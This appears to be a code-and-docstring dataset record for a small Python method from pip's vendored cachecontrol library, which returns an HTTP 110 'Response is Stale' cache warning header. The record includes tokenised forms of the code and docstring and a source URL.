(self, response)
return '110 - "Response is Stale"'
Return a valid 1xx warning header value describing the cache adjustments. The response is provided too allow warnings like 113 http://tools.ietf.org/html/rfc7234#section-5.5.4 where we need to explicitly say response is over 24 hours old.
Return a valid 1xx warning header value describing the cache adjustments.
[ "Return", "a", "valid", "1xx", "warning", "header", "value", "describing", "the", "cache", "adjustments", "." ]
def warning(self, response): """ Return a valid 1xx warning header value describing the cache adjustments. The response is provided too allow warnings like 113 http://tools.ietf.org/html/rfc7234#section-5.5.4 where we need to explicitly say response is over 24 hours old. """ return '110 - "Response is Stale"'
[ "def", "warning", "(", "self", ",", "response", ")", ":", "return", "'110 - \"Response is Stale\"'" ]
https://github.com/khanhnamle1994/natural-language-processing/blob/01d450d5ac002b0156ef4cf93a07cb508c1bcdc5/assignment1/.env/lib/python2.7/site-packages/pip/_vendor/cachecontrol/heuristics.py#L22-L31